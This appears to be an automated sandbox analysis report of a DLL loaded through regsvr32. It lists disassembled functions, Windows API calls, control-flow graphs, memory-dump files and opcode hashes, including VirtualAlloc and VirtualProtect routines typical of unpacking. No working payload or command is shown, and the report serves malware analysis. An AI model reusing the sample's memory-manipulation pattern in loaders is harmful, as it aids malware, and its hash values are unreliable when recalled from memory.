                                                                                                          • GlobalHandle.KERNEL32 ref: 1002AE53
                                                                                                          • GlobalLock.KERNEL32 ref: 1002AE5A
                                                                                                          • LeaveCriticalSection.KERNEL32(?,?,?,?,100863C0,100863C0,?,1002B10F,00000004,10024D5F,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002AE63
                                                                                                          • GlobalLock.KERNEL32 ref: 1002AE6F
                                                                                                          • _memset.LIBCMT ref: 1002AE89
                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 1002AEB7
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.670549584.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000002.00000002.670541372.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670611644.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670619699.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670625265.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670649680.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670654366.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670659647.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock_memset
                                                                                                          • String ID:
                                                                                                          • API String ID: 496899490-0
                                                                                                          • Opcode ID: 0164f1c6eb9680f14c75084477ec16f681797b22eeba17cddfee44694ed90e92
                                                                                                          • Instruction ID: 1a22abfe9f33a297b41a0f192d06fc5d98366496c497f4e189800256e1e6bccf
                                                                                                          • Opcode Fuzzy Hash: 0164f1c6eb9680f14c75084477ec16f681797b22eeba17cddfee44694ed90e92
                                                                                                          • Instruction Fuzzy Hash: 1E31AD71600715AFEB21CF68DD89A1BBBF9FF46301B42892DE55AD3661DB30F8818B50
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 1002E577, Relevance: 7.5, APIs: 5, Instructions: 44memoryCOMMONLIBRARYCODE
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          APIs
                                                                                                          • __lock.LIBCMT ref: 1002E595
                                                                                                            • Part of subcall function 10035865: __mtinitlocknum.LIBCMT ref: 1003587B
                                                                                                            • Part of subcall function 10035865: __amsg_exit.LIBCMT ref: 10035887
                                                                                                            • Part of subcall function 10035865: EnterCriticalSection.KERNEL32(00000000,00000000,?,1003481B,0000000D,1004E828,00000008,10034912,00000000,?,1002E9AC,00000000,?,?,?,1002EA0F), ref: 1003588F
                                                                                                          • ___sbh_find_block.LIBCMT ref: 1002E5A0
                                                                                                          • ___sbh_free_block.LIBCMT ref: 1002E5AF
                                                                                                          • RtlFreeHeap.NTDLL(00000000,00000000,1004E648,0000000C,10034761,00000000,?,100351BF,00000000,00000001,00000000,?,100357EF,00000018,1004E870,0000000C), ref: 1002E5DF
                                                                                                          • GetLastError.KERNEL32(?,100351BF,00000000,00000001,00000000,?,100357EF,00000018,1004E870,0000000C,10035880,00000000,00000000,?,1003481B,0000000D), ref: 1002E5F0
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.670549584.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000002.00000002.670541372.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670611644.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670619699.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670625265.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670649680.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670654366.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670659647.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                                                                          • String ID:
                                                                                                          • API String ID: 2714421763-0
                                                                                                          • Opcode ID: 4be1625d71f223fd5a529c098bfd6286ab20592f98f3d388c1b792f7bfa5bc77
                                                                                                          • Instruction ID: 15e9110145b1e9c1bde58837c3f2254f90dacbefcca8cfa7097211139088966e
                                                                                                          • Opcode Fuzzy Hash: 4be1625d71f223fd5a529c098bfd6286ab20592f98f3d388c1b792f7bfa5bc77
                                                                                                          • Instruction Fuzzy Hash: E001A7358567669EEB21DBB1AC0574D3BE4FF01796F900415F404AA4D1DF34AD40CB54
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 100036A0, Relevance: 4.4, APIs: 1, Strings: 1, Instructions: 937COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 131 100036a0-100036bb call 1002e654 133 100036c0-100036e5 131->133 135 10003896-100038b1 133->135 136 100036eb-10003891 133->136 138 100038b7-10004a34 135->138 139 10004a39-10004a3d 135->139
                                                                                                          APIs
                                                                                                          • _malloc.LIBCMT ref: 100036BB
                                                                                                            • Part of subcall function 1002E654: __FF_MSGBANNER.LIBCMT ref: 1002E677
                                                                                                            • Part of subcall function 1002E654: __NMSG_WRITE.LIBCMT ref: 1002E67E
                                                                                                            • Part of subcall function 1002E654: RtlAllocateHeap.NTDLL(00000000,-0000000F,00000001,00000000,00000000,?,100351BF,00000000,00000001,00000000,?,100357EF,00000018,1004E870,0000000C,10035880), ref: 1002E6CB
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.670549584.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000002.00000002.670541372.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670611644.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670619699.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670625265.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670649680.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670654366.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670659647.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AllocateHeap_malloc
                                                                                                          • String ID: +';
                                                                                                          • API String ID: 501242067-2694261586
                                                                                                          • Opcode ID: 0b326109276fce54ba6433786671c084a7be121183821a19a2d99cb653a252e6
                                                                                                          • Instruction ID: 8c5fde967666ed0afc5dc7c826d0591e9b318715144b3c37a2536eafdc0580d3
                                                                                                          • Opcode Fuzzy Hash: 0b326109276fce54ba6433786671c084a7be121183821a19a2d99cb653a252e6
                                                                                                          • Instruction Fuzzy Hash: 8FB21B369120218FE70ADFACDED5F257BA6F794608747B21FC4018737ADE306464CA5A
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 10003440, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 199COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 140 10003440-1000344d 141 10003454-10003462 140->141 142 1000344f call 100033f0 140->142 144 10003464-10003466 141->144 145 1000346b-10003486 141->145 142->141 146 10003699-1000369c 144->146 147 10003495-100034a2 145->147 148 10003488-10003493 145->148 149 100034b1-100034b7 call 1002e654 147->149 150 100034a4-100034af 147->150 148->147 152 100034bc-100034c6 149->152 150->149 153 100034c8-100034ca 152->153 154 100034cf-100034d6 152->154 153->146 155 100034dd-100034e3 154->155 156 10003696 155->156 157 100034e9-100034f5 155->157 156->146 158 100034f7-10003509 157->158 159 1000350b-10003527 157->159 160 1000352a-1000353c 158->160 159->160 161 10003552-1000356d 160->161 162 1000353e-10003550 160->162 163 10003570-10003582 161->163 162->163 164 10003584-10003596 163->164 165 10003598-100035b4 163->165 166 100035b7-100035c9 164->166 165->166 167 100035cb-100035dd 166->167 168 100035df-100035fb 166->168 169 100035fe-10003628 167->169 168->169 170 10003647-1000364f 169->170 171 1000362a-10003644 169->171 172 10003651-1000366b 170->172 173 1000366e-10003676 170->173 171->170 172->173 174 10003691 173->174 175 10003678-1000368e 173->175 174->155 175->174
                                                                                                          APIs
                                                                                                            • Part of subcall function 100033F0: _malloc.LIBCMT ref: 100033F9
                                                                                                          • _malloc.LIBCMT ref: 100034B7
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.670549584.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000002.00000002.670541372.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670611644.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670619699.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670625265.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670649680.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670654366.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670659647.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _malloc
                                                                                                          • String ID: +';
                                                                                                          • API String ID: 1579825452-2694261586
                                                                                                          • Opcode ID: 03de1ce98db81d32a198f84050ea0a9e1233ff5b21d79efe49771c2647b1339e
                                                                                                          • Instruction ID: 6db3f6523064f320fd84e53d4013fc8a18f56f5699846b59c9fd9a4c566afa3d
                                                                                                          • Opcode Fuzzy Hash: 03de1ce98db81d32a198f84050ea0a9e1233ff5b21d79efe49771c2647b1339e
                                                                                                          • Instruction Fuzzy Hash: B891E770E04649AFDB09CF98C490AAEBBB2FF85345F24C199D915AB359C335AA90CF44
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 10002690, Relevance: 3.1, APIs: 2, Instructions: 98COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 176 10002690-100026a0 177 100026a2-100026a7 176->177 178 100026ac-100026b8 176->178 179 100027ac-100027af 177->179 180 10002714-10002776 178->180 181 100026ba-100026c5 178->181 184 10002784-100027a1 VirtualProtect 180->184 185 10002778-10002781 180->185 182 100026c7-100026ce 181->182 183 1000270a-1000270f 181->183 186 100026d0-100026de 182->186 187 100026f2-10002704 VirtualFree 182->187 183->179 188 100027a3-100027a5 184->188 189 100027a7 184->189 185->184 186->187 190 100026e0-100026f0 186->190 187->183 188->179 189->179 190->183 190->187
                                                                                                          APIs
                                                                                                          • VirtualFree.KERNELBASE(00000000,?,00004000,?,10002928,00000001,00000000,?,100030A8,?,?,?,?,100030A8,00000000,00000000), ref: 10002704
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.670549584.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000002.00000002.670541372.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670611644.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670619699.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670625265.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670649680.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670654366.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670659647.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FreeVirtual
                                                                                                          • String ID:
                                                                                                          • API String ID: 1263568516-0
                                                                                                          • Opcode ID: 3c4ab6a1de08e5656c1cdd8e190091452f899426c6fe537940d40abfc070cfe1
                                                                                                          • Instruction ID: e47a27f64338b3e84d430cb899d867ed3d67d72a97b2c0655aeaec8263a425f7
                                                                                                          • Opcode Fuzzy Hash: 3c4ab6a1de08e5656c1cdd8e190091452f899426c6fe537940d40abfc070cfe1
                                                                                                          • Instruction Fuzzy Hash: 8841B77461410AAFEB48CF58C490BA9B7B2FB88364F14C659EC1A9F355C731EE41CB84
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 100024D0, Relevance: 2.6, APIs: 2, Instructions: 115memoryCOMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 191 100024d0-100024fe 192 10002512-1000251e 191->192 193 10002524-1000252b 192->193 194 10002616 192->194 195 10002593-100025ae call 100024a0 193->195 196 1000252d-1000253a 193->196 197 1000261b-1000261e 194->197 205 100025b0-100025b2 195->205 206 100025b4-100025d9 VirtualAlloc 195->206 198 1000253c-1000255e VirtualAlloc 196->198 199 1000258e 196->199 201 10002560-10002562 198->201 202 10002567-1000258b call 100022d0 198->202 199->192 201->197 202->199 205->197 208 100025db-100025dd 206->208 209 100025df-1000260e call 10002320 206->209 208->197 209->194
                                                                                                          APIs
                                                                                                          • VirtualAlloc.KERNEL32(4D8B0000,00000000,00001000,00000004,?,1000303F,00000000), ref: 10002551
                                                                                                          • VirtualAlloc.KERNELBASE(4D8B0000,8B118BBC,00001000,00000004,1001DF0A,8B118BBC,?,1000303F,00000000,1001DF0A,?), ref: 100025CC
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.670549584.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000002.00000002.670541372.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670611644.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670619699.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670625265.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670649680.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670654366.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670659647.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AllocVirtual
                                                                                                          • String ID:
                                                                                                          • API String ID: 4275171209-0
                                                                                                          • Opcode ID: 1d05fb9c1b52efa1b656e8a9f1121a2f78f34b5e3947038098bbbc68630c54fe
                                                                                                          • Instruction ID: f227e8c1e280d8d0b8d11f9a2f1445d4c625449e48c39147985fdcb30a9e5b67
                                                                                                          • Opcode Fuzzy Hash: 1d05fb9c1b52efa1b656e8a9f1121a2f78f34b5e3947038098bbbc68630c54fe
                                                                                                          • Instruction Fuzzy Hash: FE51E9B4A0010AEFDB04CF94C990AAEB7F1FF48345F248598E905AB345D370EE91CBA5
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 10024BD0, Relevance: 1.6, APIs: 1, Instructions: 84COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          APIs
                                                                                                          • __EH_prolog3_catch.LIBCMT ref: 10024BD7
                                                                                                            • Part of subcall function 10020421: _malloc.LIBCMT ref: 1002043F
                                                                                                            • Part of subcall function 1002AC5C: LocalAlloc.KERNEL32(00000040,?,?,1002AFE7,00000010,?,?,00000000,?,00000004,10024D5F,10022808,100207B2,?,100229B3,00000004), ref: 1002AC66
                                                                                                            • Part of subcall function 100248E2: __EH_prolog3.LIBCMT ref: 100248E9
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.670549584.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000002.00000002.670541372.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670611644.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670619699.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670625265.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670649680.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670654366.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670659647.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AllocH_prolog3H_prolog3_catchLocal_malloc
                                                                                                          • String ID:
                                                                                                          • API String ID: 1104862767-0
                                                                                                          • Opcode ID: fd7fb294918823335492a66fe64f990aaa4eeed4153628f3b589ca3afe8965ee
                                                                                                          • Instruction ID: a1f779584784c66b6c6d6693aa33ee417c0f7bf9ec3ebef889974536428868aa
                                                                                                          • Opcode Fuzzy Hash: fd7fb294918823335492a66fe64f990aaa4eeed4153628f3b589ca3afe8965ee
                                                                                                          • Instruction Fuzzy Hash: 87317AB4A05B40CFD761CF69904125EFBF0FF94700FA08A1EA19A87791CB71A640CB15
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 1001FB60, Relevance: 1.6, APIs: 1, Instructions: 80COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 246 1001fb60-1001fba1 call 100236ce 248 1001fba3-1001fbaa 246->248 249 1001fbb1-1001fbb7 248->249 250 1001fbac call 1001fb50 248->250 252 1001fbc1-1001fbc4 249->252 253 1001fbb9-1001fbbf 249->253 250->249 254 1001fbc7-1001fc07 call 1002e804 252->254 253->254 257 1001fc09-1001fc19 254->257 258 1001fc1e-1001fc2c 254->258 257->258
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.670549584.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000002.00000002.670541372.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670611644.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670619699.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670625265.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670649680.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670654366.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670659647.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _memcpy_s
                                                                                                          • String ID:
                                                                                                          • API String ID: 2001391462-0
                                                                                                          • Opcode ID: d3dc88160a5e56be7f368e8a08c7792e6ef88e5c4e6cc4fd85bb2cebbcebf868
                                                                                                          • Instruction ID: f5ed4905dd4460340b5ac9a4a0a7973f6bbe06acb99917e18be8531ceafe8f55
                                                                                                          • Opcode Fuzzy Hash: d3dc88160a5e56be7f368e8a08c7792e6ef88e5c4e6cc4fd85bb2cebbcebf868
                                                                                                          • Instruction Fuzzy Hash: EA3197B4E0060ADFCB04DF98C891AAEB7B1FF88310F148699E915AB355D730AD41CF94
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 1002B0BB, Relevance: 1.5, APIs: 1, Instructions: 43COMMONLIBRARYCODE
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 260 1002b0bb-1002b0d3 call 10030535 263 1002b0d5 call 10023b5b 260->263 264 1002b0da-1002b0dd 260->264 263->264 266 1002b115-1002b126 call 1002ac8f 264->266 267 1002b0df-1002b0e7 264->267 276 1002b13b-1002b142 call 1003060d 266->276 277 1002b128-1002b136 call 1002af6b 266->277 268 1002b10a call 1002adac 267->268 269 1002b0e9-1002b108 call 1002aec4 267->269 275 1002b10f-1002b113 268->275 269->263 269->268 275->263 275->266 277->276
                                                                                                          APIs
                                                                                                          • __EH_prolog3.LIBCMT ref: 1002B0C2
                                                                                                            • Part of subcall function 10023B5B: __CxxThrowException@8.LIBCMT ref: 10023B71
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.670549584.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000002.00000002.670541372.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670611644.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670619699.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670625265.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670649680.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670654366.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670659647.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Exception@8H_prolog3Throw
                                                                                                          • String ID:
                                                                                                          • API String ID: 3670251406-0
                                                                                                          • Opcode ID: 4f981416dc5ef7bbdfecb2dfbb495584922b02ae1a1aa31fe3482948e2cc2218
                                                                                                          • Instruction ID: c80a5d1f5578f8721dbd374575b215f2d5835d67e27bcfac389e5dd05e3c6f9c
                                                                                                          • Opcode Fuzzy Hash: 4f981416dc5ef7bbdfecb2dfbb495584922b02ae1a1aa31fe3482948e2cc2218
                                                                                                          • Instruction Fuzzy Hash: FE017C386006438BDB26DF64DC6172E76E2EB843A1FA2442EE9518B291EF359D41CB40
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 10008000, Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 282 10008000-1000801a call 1002e654 285 10008023-10008037 282->285 286 1000801c-10008021 282->286 288 1000804b-10008052 285->288 287 1000807b-1000807e 286->287 289 10008054-1000805c 288->289 290 1000805e-10008062 call 1002e577 288->290 289->288 293 10008067-10008070 290->293 294 10008072-10008074 293->294 295 10008076 293->295 294->287 295->287
                                                                                                          APIs
                                                                                                          • _malloc.LIBCMT ref: 1000800B
                                                                                                            • Part of subcall function 1002E654: __FF_MSGBANNER.LIBCMT ref: 1002E677
                                                                                                            • Part of subcall function 1002E654: __NMSG_WRITE.LIBCMT ref: 1002E67E
                                                                                                            • Part of subcall function 1002E654: RtlAllocateHeap.NTDLL(00000000,-0000000F,00000001,00000000,00000000,?,100351BF,00000000,00000001,00000000,?,100357EF,00000018,1004E870,0000000C,10035880), ref: 1002E6CB
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.670549584.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000002.00000002.670541372.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670611644.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670619699.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670625265.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670649680.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670654366.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670659647.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AllocateHeap_malloc
                                                                                                          • String ID:
                                                                                                          • API String ID: 501242067-0
                                                                                                          • Opcode ID: 9844e1e0ea7d25e2d8370f8d0841ec7162df559c8b01d3b16c313ebecebe2b95
                                                                                                          • Instruction ID: 9a20b1d8cf5172607ffba420905976db52b7852b2de11c78eab645b8586f80a8
                                                                                                          • Opcode Fuzzy Hash: 9844e1e0ea7d25e2d8370f8d0841ec7162df559c8b01d3b16c313ebecebe2b95
                                                                                                          • Instruction Fuzzy Hash: BD012CB4D08158EBEB00CFA4D85569EBBB4FB00394F108895D9516B305D376AB18DB91
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 100236CE, Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 296 100236ce-100236dc 297 100236e2-100236ed call 1002e654 296->297 298 100236de-100236e0 296->298 301 100236f2-100236f5 297->301 300 10023707-1002370a 298->300 301->298 302 100236f7-10023704 301->302 302->300
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.670549584.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000002.00000002.670541372.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670611644.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670619699.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670625265.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670649680.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670654366.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670659647.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _malloc
                                                                                                          • String ID:
                                                                                                          • API String ID: 1579825452-0
                                                                                                          • Opcode ID: f1b84940060e793f2024458e4c8e5a4687c3363722e5127f1986a87a664482b3
                                                                                                          • Instruction ID: 890261fd43258a4c098dfe067f91bb2ba3d5f49a8a728e9457d7994589d2c75f
                                                                                                          • Opcode Fuzzy Hash: f1b84940060e793f2024458e4c8e5a4687c3363722e5127f1986a87a664482b3
                                                                                                          • Instruction Fuzzy Hash: 4CE06D766006156BC700CB4AE408A46BBDCDFA13B0F56C466E808CB252CAB1E8048BA0
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 1002ACFB, Relevance: 1.5, APIs: 1, Instructions: 21COMMONLIBRARYCODE
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 303 1002acfb-1002ad0d call 10030568 306 1002ad30-1002ad37 call 1003060d 303->306 307 1002ad0f-1002ad1e call 1002a6ab 303->307 312 1002ad20 call 10024d0b 307->312 313 1002ad25-1002ad2b call 1002a71d 307->313 315 1002ad23 312->315 313->306 315->313
                                                                                                          APIs
                                                                                                          • __EH_prolog3_catch.LIBCMT ref: 1002AD02
                                                                                                            • Part of subcall function 1002A6AB: EnterCriticalSection.KERNEL32(10086308,?,?,?,?,1002AD16,00000010,00000008,10024D7E,10024D21,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002A6E5
                                                                                                            • Part of subcall function 1002A6AB: InitializeCriticalSection.KERNEL32(?,?,?,?,?,1002AD16,00000010,00000008,10024D7E,10024D21,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002A6F7
                                                                                                            • Part of subcall function 1002A6AB: LeaveCriticalSection.KERNEL32(10086308,?,?,?,?,1002AD16,00000010,00000008,10024D7E,10024D21,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002A704
